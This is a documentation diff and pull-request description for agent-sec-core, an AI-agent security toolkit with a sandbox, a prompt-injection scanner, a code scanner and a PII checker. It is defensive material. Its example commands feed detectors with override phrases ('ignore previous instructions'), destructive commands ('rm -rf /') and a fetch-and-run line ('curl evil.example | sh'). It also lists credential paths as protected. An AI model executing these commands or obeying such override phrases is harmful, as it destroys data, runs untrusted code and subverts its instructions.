-安全检查工作流（Phase 1-3 + 安全决策）由 `agent-sec-cli` 提供，各阶段通过独立 CLI 子命令调用。
-
-## 安全检查工作流
-
-每次 Agent 执行前，按顺序完成以下安全检查（Phase 1-3），**全部通过后才允许进入安全决策流程**。
-
-| 阶段 | 说明 | 入口 | 通过条件 |
-|------|------|------|----------|
-| **Phase 1** | 系统安全加固 — `loongshield seharden --scan --config agentos_baseline` | `agent-sec-cli harden --scan` | 输出包含 `结果：合规` |
-| **Phase 2** | 关键资产保护 — GPG 签名 + SHA-256 哈希校验所有 skill | `agent-sec-cli verify` | 输出包含 `VERIFICATION PASSED` |
-| **Phase 3** | 最终安全确认 — 重新执行 Phase 1 scan + Phase 2 verify 作为复检 | 重新调用上述命令 | 复检全部通过 |
-
-任一 Phase 未通过，后续 Phase 全部取消，Agent 执行被阻断。
-
-## 风险分级与处置
-
-| 风险等级 | 典型场景 | 处置策略 |
-|---------|---------|---------|
-| **低** | 文件读取、信息查询、文本处理 | 允许，沙箱内执行 |
-| **中** | 代码执行、包安装、调用外部 API | 沙箱隔离 + 用户确认 |
-| **高** | 读取 `.env`/SSH 密钥、数据外发、修改系统配置 | 阻断，除非用户显式批准 |
-| **危急** | Prompt injection、secret 外泄、禁用安全策略 | 立即阻断 + 审计日志 + 通知用户 |
-
-**存疑时，按高风险处理。**
-
-## 受保护资产
-
-### 系统凭证
-
-绝不允许 Agent 访问或外传：
-
-- SSH 密钥（`/etc/ssh/`、`~/.ssh/`）
-- GPG 私钥
-- API tokens / OAuth credentials
-- 数据库凭证
-- `/etc/shadow`、`/etc/gshadow`
-- 主机标识信息（IP、MAC、`hostname`）
-
-### 系统关键文件
-
-以下路径受写保护：
-
-- `/etc/passwd`、`/etc/shadow`、`/etc/sudoers`
-- `/etc/ssh/sshd_config`、`/etc/pam.d/`、`/etc/security/`
-- `/etc/sysctl.conf`、`/etc/sysctl.d/`
-- `/boot/`、`/usr/lib/systemd/`、`/etc/systemd/system/`
-
-## 沙箱策略模板
-
-`linux-sandbox` 提供 3 种内置策略模板：
-
-| 模板 | 文件系统 | 网络 | 使用场景 |
-|------|---------|------|---------|
-| **read-only** | 全盘只读 | 禁止 | 只读操作：`ls`、`cat`、`grep`、`git status` 等 |
-| **workspace-write** | cwd + /tmp 可写，其余只读 | 禁止 | 构建、编辑、脚本执行等需要写文件的操作 |
-| **danger-full-access** | 无限制 | 允许 | ⚠ 保留模板，仅供特殊场景手动指定 |
-
-命令分类直接映射沙箱模式：
-
-| 分类 | 沙箱模式 | 说明 |
-|------|---------|------|
-| `destructive` | ❌ 拒绝执行 | 危险命令，直接拒绝 |
-| `dangerous` | workspace-write | 高风险操作，不允许额外补权限 |
-| `safe` | read-only | 只读操作，无需补权限 |
-| `default` | workspace-write | 常规操作，可按需补网络/写路径 |
 
 ## 项目结构
 
 ```
 agent-sec-core/
 ├── linux-sandbox/             # Rust 沙箱执行器（bubblewrap + seccomp）
-│   ├── src/                   # Rust 源码（cli, policy, seccomp, proxy, …）
-│   ├── tests/                 # Rust 集成测试 + Python e2e
+│   ├── src/                   # Rust 源码（cli, policy, seccomp, bwrap_args, …）
+│   ├── tests/                 # Rust 集成测试
 │   └── docs/                  # dev-guide, user-guide
-├── agent-sec-cli/             # 统一 CLI + 安全中间层（Python）
+├── agent-sec-cli/             # 统一 CLI + 安全中间层（Python + Rust 扩展）
 │   ├── src/agent_sec_cli/     # 主 Python 包
 │   │   ├── cli.py             # CLI 入口点（Typer）
-│   │   ├── asset_verify/      # Skill 签名 + 哈希校验
-│   │   ├── code_scanner/      # 代码安全扫描引擎
-│   │   ├── sandbox/           # 沙箱策略生成
-│   │   ├── skill_ledger/      # Ed25519 完整性账本（check/certify/status）
-│   │   ├── security_events/   # JSONL 事件日志
-│   │   └── security_middleware/ # 中间层 + 后端实现
+│   │   ├── asset_verify/      # Skill GPG 签名 + 哈希校验
+│   │   ├── code_scanner/      # 代码扫描引擎（regex + llm）与规则集
+│   │   ├── prompt_scanner/    # 提示词注入 / 越狱扫描器
+│   │   ├── pii_checker/       # PII 与凭证检测
+│   │   ├── skill_ledger/      # Ed25519 完整性账本与内置扫描器
+│   │   ├── sandbox/           # 命令分类 + 沙箱策略生成
+│   │   ├── observability/     # Observability 记录、report、审查 TUI
+│   │   ├── security_events/   # JSONL + SQLite 事件存储
+│   │   ├── security_middleware/ # 中间层 + 后端实现
+│   │   ├── daemon/            # agent-sec-daemon 服务端与客户端
+│   │   ├── model_service/     # 本地模型后端（如 Ollama）
+│   │   └── telemetry/         # Telemetry schema 与写入器
 │   ├── dev-tools/             # 后端扩展开发指南
 │   └── pyproject.toml         # 构建配置
-├── qwen-code-extension/       # Qwen Code PII 策略与 Observability hooks
-├── skills/                    # 安全相关 skill 集合（skill-ledger、code-scanner、prompt-scanner 等）
+├── cosh-extension/            # Copilot Shell hooks + 沙箱 guard
+├── openclaw-plugin/           # OpenClaw 插件（TypeScript）
+├── hermes-plugin/             # Hermes 插件（Python capabilities）
+├── qwen-code-extension/       # Qwen Code hooks
+├── qoder-plugin/              # Qoder CLI hooks
+├── codex-plugin/              # Codex hooks
+├── skills/                    # 安全 skill：code-scanner、prompt-scanner、skill-ledger
 ├── tools/                     # sign-skill.sh — PGP 技能签名工具
-├── tests/                     # 单元测试、集成测试、端到端测试
+├── packaging/                 # raw 包构建 + systemd unit 模板
+├── scripts/                   # CLI/daemon wrapper 与 CI 辅助脚本
+├── docs/design/               # 设计文档
+├── tests/                     # 单元测试、集成测试、打包测试、端到端测试
+├── .anolisa/component.toml    # ANOLISA 组件契约
 ├── LICENSE
 ├── Makefile
-├── agent-sec-core.spec        # RPM 打包 spec
+├── agent-sec-core.spec.in     # RPM 打包 spec 模板
 ├── README.md
 └── README_zh.md
 ```
+
+六个 Agent 宿主均已实现全部五类 hook（code-scanner、prompt-scanner、pii-checker、
+skill-ledger、observability）；各宿主支持的处置模式不同，见
+[Agent Hook 环境变量](#agent-hook-环境变量)。
+
+各 adapter 专项说明：
+[OpenClaw](openclaw-plugin/README.md) ·
+[Hermes](hermes-plugin/README.md) ·
+[Codex](codex-plugin/README.md) ·
+[Qwen Code](qwen-code-extension/README.md)
 
 ## Observability Hook 配置
 
@@ -161,11 +142,13 @@ capability。
 | 组件 | 要求 |
 |------|------|
 | **操作系统** | Alibaba Cloud Linux / Anolis / RHEL 系列 |
-| **权限** | root 或 sudo |
-| **loongshield** | >= 1.1.1（Phase 1 系统加固核心依赖） |
-| **gpg / gnupg2** | >= 2.0（Phase 2 资产签名校验） |
-| **Python3** | >= 3.6 |
-| **Rust** | >= 1.91（用于构建 linux-sandbox） |
+| **权限** | root 或 sudo（system mode 安装） |
+| **loongshield** | >= 1.2.0（Security Baseline 后端） |
+| **gpg / gnupg2** | >= 2.0（资产签名校验） |
+| **Python** | 3.11.6（已固定；RPM 要求 `>= 3.11, < 3.12`） |
+| **Rust** | >= 1.93（用于构建 `linux-sandbox` 与 CLI 原生扩展） |
+| **bubblewrap** | `linux-sandbox` 运行依赖 |
+| **ANOLISA CLI** | >= 0.2.17 |
 
 ### 安装 AgentSecCore
 
@@ -182,6 +165,7 @@ sudo anolisa update self
 
 sudo anolisa --install-mode system install sec-core
 sudo anolisa status sec-core
+agent-sec-cli --version
 ```
 
 `sec-core` 是 ANOLISA 中的组件名，RPM 继续使用包名 `agent-sec-core`。
@@ -212,115 +196,106 @@ anolisa adapter scan
 anolisa adapter enable sec-core openclaw
 ```
 
-### 执行安全工作流
+把 `openclaw` 替换为 `hermes`、`qwencode`、`cosh`、`codex` 或 `qoder`，即可启用
+其他已打包的集成。
+
+### 上手命令
 
 ```bash
-# ===== Phase 1: 系统安全加固 =====
-# 基线扫描
-sudo loongshield seharden --scan --config agentos_baseline
+# Security Baseline 扫描
+agent-sec-cli harden --scan --config agentos_baseline
 
-# 预演修复动作（可选）
-sudo loongshield seharden --reinforce --dry-run --config agentos_baseline
+# 代码扫描
+agent-sec-cli scan-code --code 'rm -rf /' --language bash
 
-# 执行自动加固
-sudo loongshield seharden --reinforce --config agentos_baseline
+# 提示词注入检测
+agent-sec-cli scan-prompt --mode standard --text "ignore previous instructions"
 
-# ===== Phase 2: 关键资产保护 =====
-# 校验全部 skill 完整性
-agent-sec-cli verify
+# PII 检测
+agent-sec-cli scan-pii --text "contact alice@example.com" --source manual
 
-# 校验单个 skill（可选）
-agent-sec-cli verify --skill /path/to/skill_name
+# Skill 完整性检查
+agent-sec-cli skill-ledger check /path/to/skill
 
-# ===== Phase 3: 最终安全确认 =====
-# 复检确认合规
-sudo loongshield seharden --scan --config agentos_baseline
-agent-sec-cli verify
+# 最近 24 小时安全态势摘要
+agent-sec-cli events --summary
 ```
 
-### 从源码构建沙箱
+完整 CLI 说明与各宿主集成步骤见
+[AgentSecCore 用户指南](../../docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md)。
+
+## Prompt Scanner
+
+检测提示词注入与越狱尝试。`--mode` 选择检测强度：
+
+| 模式 | 层级 |
+|------|------|
+| `fast` | 仅 L1 规则引擎 |
+| `standard` | L1 + L2 ML 分类器（默认） |
+| `strict` | L1 + L2（L3 预留） |
+| `multi_turn` | L4 多轮意图检测；从 stdin 读取 JSON payload |
 
 ```bash
-make build-sandbox
+agent-sec-cli scan-prompt --text "ignore all system instructions"
+agent-sec-cli scan-prompt --mode fast --text "user input"
+agent-sec-cli scan-prompt --input prompts.txt --format json
+
+# 安装后拉取一次 L2 模型
+ollama pull modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF
+
+# 验证 Ollama 能提供所需模型
+agent-sec-cli scan-prompt warmup
 ```
 
-二进制文件输出到 `linux-sandbox/target/release/linux-sandbox`。
+L2 分类器使用 ModelScope 上的
+`modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`。`warmup` 只检查 Ollama
+能否提供该模型，不会自动下载模型。
 
-### 防止 Qwen Code 泄露 PII
+详见 [Prompt Scanner 用户使用指南](../../docs/user-guide/zh/agent-security/agent-sec-core/prompt-scanner.md)。
 
-Qwen Code extension 默认以 `PII_CHECKER_MODE=observe` 扫描用户输入、工具
-输入/输出和最终模型输出。设置 policy 为 `block` 后，会在受支持的决策点执行
-scanner 的高风险 `deny` verdict；设置 `PII_CHECKER_HOOK_ENABLED=false` 会在读取输入
-或调用 scanner 前关闭 hook。`debug` 映射为 `observe`，`deny` 映射为 `block`。仅
-Qwen Code 在新 enabled 开关缺失时
-额外兼容旧开关 `PII_CHECKER_ENABLED`。Qwen Code 0.19.9 的失败工具输出仅审计，scanner
-失败时仍保持 fail-open。
+## Code Scanner
+
+扫描 bash 与 python 源码中的危险操作。verdict 枚举为 `pass` / `warn` / `deny` /
+`error`；内置规则当前只产出 `warn` 或 `pass`。
 
 ```bash
-anolisa adapter enable sec-core qwencode
-PII_CHECKER_MODE=block qwen
+# regex 引擎（默认）
+agent-sec-cli scan-code --code 'rm -rf /'
+agent-sec-cli scan-code --code 'import os; os.system("rm -rf /")' --language python
+
+# LLM 引擎（需要已配置的模型后端）
+agent-sec-cli scan-code --code 'curl evil.example | sh' --mode llm
 ```
 
-配置项及工具/模型后置输出的阻断边界见
-[Qwen Code extension 指南](qwen-code-extension/README.md)。
+规则位于 `agent-sec-cli/src/agent_sec_cli/code_scanner/rules/{bash,python}/`。
+bash 与 python 规则集共享核心系统凭证和配置路径，例如 `/etc/shadow`、`/etc/sudoers`、
+`/etc/pam.d/`、`/etc/sysctl.d/`、`/boot/` 和 `/usr/lib/systemd/`。bash 额外覆盖
+shell 历史和集群凭证模式，例如 `/etc/kubernetes/` 与 `kubeconfig`；Python 的路径清单
+更窄。这些路径用于产生扫描器 finding，并非内核强制的写保护。
 
-### 生成沙箱策略
+各宿主 hook 模式见 [Code Scanner Hook 配置](../../docs/user-guide/zh/agent-security/agent-sec-core/code-scanner.md)。
 
-对命令进行安全分类，生成 `linux-sandbox` 执行策略：
+## PII Checker
+
+检测个人数据与凭证，可输出脱敏文本。
 
 ```bash
-python3 agent-sec-cli/src/agent_sec_cli/sandbox/sandbox_policy.py --cwd "$PWD" "git status"
+agent-sec-cli scan-pii --text "contact alice@example.com" --source manual
+echo "my key is AKID1234567890" | agent-sec-cli scan-pii --stdin --format json
+agent-sec-cli scan-pii --text "card 4111111111111111" --redact-output
+agent-sec-cli scan-pii --input ./sample.log --include-low-confidence
 ```
 
-输出示例：
-```json
-{
-  "decision": "sandbox",
-  "classification": "safe",
-  "sandbox_mode": "read-only",
-  "sandbox_command": "linux-sandbox --sandbox-policy-cwd ... -- git status"
-}
-```
+可在 `~/.config/agent-sec/pii-checker/rules.yaml` 中添加自定义业务类型。
 
-## 资产完整性校验
-
-### 校验流程
-
-1. 加载受信公钥（`agent_sec_cli/asset_verify/trusted-keys/*.asc`）
-2. 验证 Skill 目录中 `.skill-meta/Manifest.json` 的 GPG 签名（`.skill-meta/.skill.sig`）
-3. 校验 Manifest 中所有文件的 SHA-256 哈希
-
-### 错误码
-
-| 码 | 含义 |
-|----|------|
-| 0 | 通过 |
-| 10 | 缺失 `.skill-meta/.skill.sig` |
-| 11 | 缺失 `.skill-meta/Manifest.json` |
-| 12 | 签名无效 |
-| 13 | 哈希不匹配 |
-
-### Skill 签名（自行部署快速开始）
-
-通过源码部署时，skill 默认未签名。签名后 Phase 2 才能通过：
-
-```bash
-# 1. 一次性初始化：生成 GPG 密钥 + 导出公钥
-tools/sign-skill.sh --init
-
-# 2. 批量签名所有 skill
-tools/sign-skill.sh --batch /usr/share/anolisa/skills --force
-
-# 3. 验证
-agent-sec-cli verify
-```
-
-完整指南（手动密钥管理、自定义 skill、CI/CD、问题排查）请参见 **[Skill 签名指南](tools/SIGNING_GUIDE_zh.md)**。
+详见 [PII Checker 用户使用指南](../../docs/user-guide/zh/agent-security/agent-sec-core/pii-checker.md)。
 
 ## Skill Ledger
 
 基于 Ed25519 的 Skill 目录完整性账本。在 `.skill-meta/` 中记录文件哈希、版本链和扫描结果，通过 `agent-sec-cli skill-ledger` 子命令统一管理。
 对于已有 manifest，Skill Ledger 会先验真、再检查文件漂移；已有但未签名的 manifest 会报告为 `tampered`。
+
+六种完整性状态为 `pass` / `none` / `drifted` / `warn` / `deny` / `tampered`。
 
 ### 核心命令
 
@@ -332,8 +307,9 @@ agent-sec-cli verify
 | `check <dir>` | 检测 Skill 文件是否漂移或被篡改 |
 | `show <dir>` | 展示 latest/active 暴露摘要、用户决策、告警信息和 findings |
 | `export <dir> --version latest --output <path>` | 导出签名 snapshot、manifest 和 findings 供审查 |
-| `decide <dir> --action allow|always_allow|block|rollback` | 记录用户决策并刷新 activation |
+| `decide <dir> --action allow\|always_allow\|block\|rollback` | 记录用户决策并刷新 activation |
 | `certify <dir> --findings <file>` | 导入外部扫描结果并签名写入 manifest |
+| `list-scanners` | 列出已注册的内置扫描器 |
 | `status` | 系统级健康概览（密钥、配置、聚合完整性） |
 | `audit <dir>` | 查看版本历史与签名链 |
 | `check --all` / `scan --all` | 对所有已注册 Skill 目录批量执行 |
@@ -420,28 +396,81 @@ agent-sec-cli capabilities --agent hermes --capability pii-check --output json
 
 表格输出仅包含稳定的用户可见列：`CAPABILITY`、`ENABLED`、`MODE`、`SCAN_MODE`、`TIMEOUT(s)` 和 `DIAGNOSTICS`。JSON 输出保留同样的用户字段，并额外包含经过脱敏投影的 `env` 条目，其中只含 `effective` 和 `default`。两种格式都不会暴露 hook matcher 列表、source 标签、Agent config 内容、config 路径或原始环境变量值。诊断信息只说明哪个设置无效及 fallback 行为，不回显原始值。
 
-## 审计日志
+## Security Baseline
 
-所有安全事件以 JSONL 格式记录至 `/var/log/agent-sec/security-events.jsonl`（回退路径：`~/.agent-sec-core/security-events.jsonl`）：
+`agent-sec-cli harden` 封装 `loongshield seharden`；当未指定动作或 profile 时，
+默认补齐 `--scan --config agentos_baseline`。
 
-```json
-{"event_id": "uuid", "event_type": "harden", "category": "hardening", "timestamp": "ISO-8601", "trace_id": "uuid", "pid": 1234, "uid": 0, "details": {"request": {...}, "result": {...}}}
+```bash
+# 合规扫描
+agent-sec-cli harden --scan --config agentos_baseline
+
+# 预演修复动作
+agent-sec-cli harden --reinforce --dry-run --config agentos_baseline
+
+# 执行修复（需要 root）
+sudo agent-sec-cli harden --reinforce --config agentos_baseline
+
+# 查看完整的下游 loongshield 帮助
+agent-sec-cli harden --downstream-help
 ```
+
+## Observability
+
+```bash
+# 交互式下钻 TUI（需要交互式终端）
+agent-sec-cli observability review
+
+# 单会话复盘报告
+agent-sec-cli observability report --last
+agent-sec-cli observability report --session-id <id> --format json
+
+# 打印公开的 observability record JSON Schema
+agent-sec-cli observability schema
+```
+
+详见 [Observability 用户指南](../../docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md#observability可观测)。
+
+## Security Events
+
+安全事件会同时写入 JSONL 与 SQLite 存储。使用 `agent-sec-cli events` 查询该存储：
+
+```bash
+agent-sec-cli events --last-hours 24
+agent-sec-cli events --category prompt_scan --output json
+agent-sec-cli events --count-by category --last-hours 24
+agent-sec-cli events --summary
+```
+
+详见 [Security Events 用户指南](../../docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md#security-events安全事件)。
+
+## Agent Hook 环境变量
+
+宿主 hook 矩阵由用户指南维护，以保持环境变量和宿主 mode 语义只有一个权威来源：
+[Agent Hook 环境变量](../../docs/user-guide/zh/agent-security/agent-sec-core/QUICKSTART.md#agent-hook-环境变量)。
 
 ## 开发
 
 ```bash
-# 构建沙箱
+# 构建全部组件（沙箱、CLI wheel、所有 adapter、skills、组件清单）
+make build-all
+
+# 单独构建
 make build-sandbox
+make build-cli
 
-# 运行 Rust 测试
-cd linux-sandbox && cargo test
+# 测试
+make test               # Python + Rust 沙箱 + OpenClaw 插件
+make test-python
+make test-rust
+make test-openclaw-plugin
 
-# 运行端到端测试（需先安装沙箱）
-python3 tests/e2e/linux-sandbox/e2e_test.py
-
-# 格式化 Python 代码
+# Lint 与格式化
+make python-lint
 make python-code-pretty
+
+# 查看全部 target
+make help
 ```
 
 ## 许可证

--- a/src/agent-sec-core/docs/design/PROMPT_SCANNER.md
+++ b/src/agent-sec-core/docs/design/PROMPT_SCANNER.md
@@ -360,7 +360,7 @@ d = result.to_dict()
 
 ## 配置说明
 
-> ⚠️ **本节描述的 Python `ScanConfig` 已被 Rust 原生实现取代**，保留作为历史设计参考。当前配置通过环境变量（见下方「L2 模型与 Ollama 配置」章）与 CLI 参数完成。
+> ⚠️ **本节描述的 Python `ScanConfig` 已被 Rust 原生实现取代**，保留作为历史设计参考。表中的 `LLM-Research/Llama-Prompt-Guard-2-86M` 是旧 Python 实现的历史默认值，不代表当前支持模型。当前 L2 仅支持 `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`，配置通过环境变量（见下方「L2 模型与 Ollama 配置」章）与 CLI 参数完成；需先执行 `ollama pull`，`scan-prompt warmup` 只验证模型可用性。
 
 ### ScanConfig 全量参数
 
@@ -368,7 +368,7 @@ d = result.to_dict()
 |------|------|--------|------|
 | `layers` | `list[str]` | `["rule_engine", "ml_classifier"]` | 启用的检测层，按顺序执行 |
 | `fast_fail` | `bool` | `True` | 首层命中后立即停止，跳过后续层。**STANDARD / STRICT 预设固定为 `False`**（L1 正则误报率高于 L2 ML，始终运行 L2 以纠正误报）|
-| `model_name` | `str` | `LLM-Research/Llama-Prompt-Guard-2-86M` | ModelScope 模型 ID（也可使用 22M 轻量版）|
+| `model_name` | `str` | `LLM-Research/Llama-Prompt-Guard-2-86M` | 旧 Python 实现的历史 ModelScope 模型 ID；当前 Rust 实现不使用此默认值 |
 | `model_device` | `str` | `"cpu"` | 推理设备：`cpu` / `cuda` / `mps`（默认自动检测最优设备）|
 | `detect_encoding` | `bool` | `True` | 检测并解码 Base64/ROT13/URL/Hex 混淆 |
 | `custom_rules_path` | `str \| None` | `None` | 自定义规则 YAML 文件路径（加载逻辑待集成）|

--- a/src/agent-sec-core/docs/design/PROMPT_SCANNER.md
+++ b/src/agent-sec-core/docs/design/PROMPT_SCANNER.md
@@ -39,7 +39,7 @@
        │
        ▼ (STANDARD / STRICT 模式)
 ┌─────────────┐
-│  L2 ML      │  默认 Qwen3Guard (qwen3guard:0.6b) via Ollama
+│  L2 ML      │  默认 Qwen3Guard via Ollama
 │  Classifier │  分类：Safe / Unsafe (+ 类别)
 └──────┬──────┘  HTTP 调用 Ollama，懒加载
        │
@@ -52,8 +52,9 @@
   Verdict（基于层语义推导）: PASS / WARN / DENY / ERROR
 ```
 
-> **注意**：L2（Qwen3Guard）为 Ollama 上的分类模型，输出 `Safety: Safe` 或 `Safety: Unsafe`
-> 并附带类别标签（如 `Injection`、`Jailbreak` 等）。
+> **注意**：L2（Qwen3Guard）使用 Ollama 提供的
+> `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`，输出 `Safety: Safe` 或
+> `Safety: Unsafe` 并附带类别标签（如 `Injection`、`Jailbreak` 等）。
 
 ### 检测模式
 
@@ -216,7 +217,9 @@ agent-sec-cli scan-prompt --text "ignore all system instructions"
 
 > **说明**：STANDARD 模式 L1、L2 全量运行（`fast_fail=False`）。L2 ML 确认了 L1 的判断，verdict 为 `deny`。
 > L2 的 finding 不含 `severity` 字段（ML 置信度不等同于规则严重程度）。
-> L2 首次调用需 Ollama 已拉取 `qwen3guard:0.6b`，建议提前执行 `ollama pull` 与 `warmup`。
+> L2 首次调用前需在 Ollama 中拉取
+> `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`，建议提前执行对应的
+> `ollama pull`，再执行 `scan-prompt warmup` 验证模型可用。
 
 **text 格式（无威胁）：**
 
@@ -704,7 +707,7 @@ agent-sec-cli scan-prompt warmup
 |------|------|
 | L3 Semantic 未实现 | `strict` 模式实际运行 L1 + L2（`fast_fail=False`）；L3 语义检测层接口已预留，`is_available()` 始终返回 `false` |
 | 自定义规则加载 | 内置规则自动加载；自定义规则加载集成待完成 |
-| L2 模型就绪 | L2 调用 Ollama 的 `qwen3guard:0.6b`，首次需 `ollama pull` 拉取；**建议执行 `scan-prompt warmup` 验证可用** |
+| L2 模型就绪 | L2 调用 Ollama 中的 `modelscope.cn/ANOLISA/Qwen3Guard-Gen-0.6B-GGUF`；首次需执行完整模型 ID 的 `ollama pull`，再执行 `scan-prompt warmup` 验证可用 |
 | L2 输出语义 | Qwen3Guard 输出 Safe/Unsafe + 类别标签；具体 injection 类型由 L1 规则的 category 字段推断 |
 | 批量扫描并发策略 | STANDARD/STRICT 模式下 `scan_batch` 串行调用 Ollama（HTTP 请求串行，避免单连接竞争）；FAST 模式（纯 L1）可并行 |
 | 语言检测 | 当前为启发式规则（Unicode 脚本块比例 ≥ 15%），非 ML 模型；支持 `zh`/`ar`/`ru`/`hi`/`en`；日文汉字及韩文归为 `zh` |

--- a/src/agent-sec-core/openclaw-plugin/README.md
+++ b/src/agent-sec-core/openclaw-plugin/README.md
@@ -424,9 +424,10 @@ Default behavior:
 
 Deployment environment variables override capability configuration. Use
 `SKILL_LEDGER_HOOK_ENABLED`, `PII_CHECKER_HOOK_ENABLED`,
-`PROMPT_SCANNER_HOOK_ENABLED`, `SKILL_LEDGER_MODE`,
-`PII_CHECKER_MODE`, and `PROMPT_SCANNER_MODE` for deployment-level
-control. Disabling Skill Ledger short-circuits before key initialization;
+`PROMPT_SCANNER_HOOK_ENABLED`, `SKILL_LEDGER_MODE`, and `PII_CHECKER_MODE` for
+deployment-level control. This plugin does not read `PROMPT_SCANNER_MODE`; its
+prompt policy is governed by `promptScanBlock`.
+Disabling Skill Ledger short-circuits before key initialization;
 disabling prompt-scan short-circuits before hook registration.
   `blockStatuses` is accepted as deprecated configuration metadata but no longer controls runtime decisions.
 


### PR DESCRIPTION
## Why

sec-core 的用户文档与 0.10.0 实际代码已出现多处偏离，按代码逐条核验后发现三类问题：

1. 两个 README 仍以「Phase 1 → Phase 2 → Phase 3 安全检查工作流」和风险分级表为主干，
   而代码中没有任何实现，属于 v0.0.x 时期遗留的叙事；同时完全没有提及 `scan-prompt`、
   `scan-pii`、`events`、`observability` 和 daemon 这些已发布能力。
2. 多个 hook 环境变量被写成所有宿主通用，实际只有部分 adapter 读取，会误导部署配置。
3. 依赖版本、打包文件名、错误码、审计日志回退路径等硬性事实过时。

## What changed

- 重构两个 README 与两份 QUICKSTART，改为按真实模块组织，并补齐此前完全缺失的
  `scan-prompt` / `scan-pii` / `events` / `observability` / daemon 说明。
- 新增跨宿主 hook 环境变量矩阵（✓/✗ 标注），收敛此前分散且互相矛盾的适用范围描述。
- 修正 `PROMPT_SCANNER_MODE`、`PROMPT_SCANNER_TIMEOUT` 在 cosh / Hermes / OpenClaw 上
  不生效，以及 `PII_CHECKER_TIMEOUT`、`PII_CHECKER_INCLUDE_LOW_CONFIDENCE` 的宿主范围。
- 修正 Hermes capability 契约：`prompt-scan-user-input` 无阻断开关、`timeout` 为 15、
  `pii-scan-user-input` 使用 `policy` 而非 `enable_block`。
- 修正依赖版本（loongshield 1.2.0、Python 3.11.6、Rust 1.93）、打包文件名
  `agent-sec-core.spec.in`、verify 错误码（补 14/20/21）、审计日志三级回退与事件字段。
- QUICKSTART 补齐缺失的 Codex 与 Qoder 集成小节；两份 user-guide 索引补 Prompt Scanner。

## Related issue

no-issue: 文档与代码一致性修正，无对应 issue。

## User / Agent impact

None。纯文档改动，不涉及任何运行时行为、CLI 接口或配置变更。

对使用者的实际收益是：按文档配置 `PROMPT_SCANNER_MODE` 等变量时不再会因为宿主不支持
而得到与预期不符的结果。

## Risk and compatibility

- [ ] Public CLI, API, configuration, or documented behavior changed
- [ ] Privileged or security-sensitive behavior changed
- [ ] Cross-component contract changed
- [ ] Migration or rollback guidance is needed

Low risk。仅修改 Markdown 文档，无代码、配置或打包改动；文档描述向现有代码行为对齐，
未改变任何被描述的运行时行为本身。

## Validation

- `bash scripts/docs-lint.sh` — 通过（命名规范 + en/zh 目录镜像均 OK）
- 全部改动文件的 Markdown 相对链接遍历校验 — 无断链
- 四张 hook 矩阵表 ✓/✗ 计数比对 — EN/ZH 与 README/QUICKSTART 均为 72 ✓ / 26 ✗，一致
- 逐条核验断言来源：各 adapter hook 源码、`agent-sec-core.spec.in`、`pyproject.toml`、
  `.anolisa/component.toml`、`asset_verify/errors.py`、`security_events/{config,schema}.py`、
  `sandbox/sandbox_policy.py`、`hermes-plugin/src/config.toml`、各 `hooks.json`
- 未运行测试套件：本次无代码改动

## Documentation and rollback

本 PR 本身即文档变更，未新增设计文档。回滚方式：`git revert` 本次 commit 即可，
无运行时副作用、无需迁移或配置回退。